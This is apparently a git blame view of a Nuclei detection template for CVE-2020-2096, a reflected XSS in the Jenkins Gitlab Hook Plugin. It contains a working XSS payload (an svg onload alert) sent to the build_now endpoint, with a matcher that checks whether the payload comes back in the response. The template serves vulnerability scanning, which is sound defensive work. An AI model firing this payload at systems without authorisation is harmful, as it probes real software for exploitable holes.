nuclei-templates/cves/2020/CVE-2020-2096.yaml

23 lines
579 B
YAML
Raw Normal View History

2021-01-02 04:56:15 +00:00
id: CVE-2020-2096
2020-04-08 10:59:57 +00:00
info:
name: Jenkins Gitlab Hook XSS
author: madrobot
2020-05-25 07:49:06 +00:00
severity: medium
2021-03-10 10:53:21 +00:00
description: Jenkins Gitlab Hook Plugin 1.4.2 and earlier does not escape project names in the build_now endpoint, resulting in a reflected XSS vulnerability.
tags: cve,cve2020,jenkins,xss
2020-04-08 10:59:57 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/gitlab/build_now%3Csvg/onload=alert(1337)%3E"
matchers-condition: and
2020-04-08 10:59:57 +00:00
matchers:
- type: status
status:
2020-05-25 07:49:06 +00:00
- 200
2020-04-08 14:42:57 +00:00
- type: word
words:
2020-05-25 07:49:06 +00:00
- "<svg/onload=alert(1337)>"
2020-04-08 10:59:57 +00:00
part: body